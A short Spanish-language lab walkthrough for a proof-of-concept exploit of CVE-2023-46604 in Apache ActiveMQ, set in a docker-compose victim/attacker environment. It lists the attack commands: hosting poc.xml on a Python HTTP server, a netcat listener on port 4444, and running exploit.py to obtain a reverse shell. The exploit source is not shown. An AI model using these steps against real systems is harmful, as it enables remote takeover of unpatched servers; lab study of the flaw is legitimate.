
Exploit de PoC para CVE-2023-46604 dirigido a Apache ActiveMQ, que entrega una reverse shell mediante una carga XML manipulada a través de HTTP.
CVE-2023-46604

Construir docker-compose que contenga 2 imágenes: la máquina víctima y la máquina objetivo según el entorno requerido En la máquina víctima, iniciar ActiveMQ
Cambiar a la máquina atacante: • Abrir el servicio HTTP para enviar el PoC: python3 -m http.server
• Usar netcat para escuchar la conexión hacia la máquina atacante nc -nlvp 4444
• Enviar el payload para crear una conexión reverse shell a la máquina atacante python3 exploit.py -i 172.18.0.3 -p 61616 --xml http://172.18.0.2:8000/poc.xml Donde:
Se puede observar que, después de ejecutar el comando para ejecutar el archivo ‘exploit.py’, el código de explotación enviará un paquete ‘poc.xml’ en el servidor web hacia el objetivo, que es la dirección del servicio ActiveMQ que se ejecuta en el servidor objetivo. Al mismo tiempo, el servidor web HTTP en la máquina atacante también recibe una solicitud enviada desde la dirección IP de la máquina objetivo.
Después de enviar el payload, cambie al terminal que está escuchando en el puerto 4444 de la máquina atacante. Vemos que el reverse shell de la máquina víctima ha sido enviado.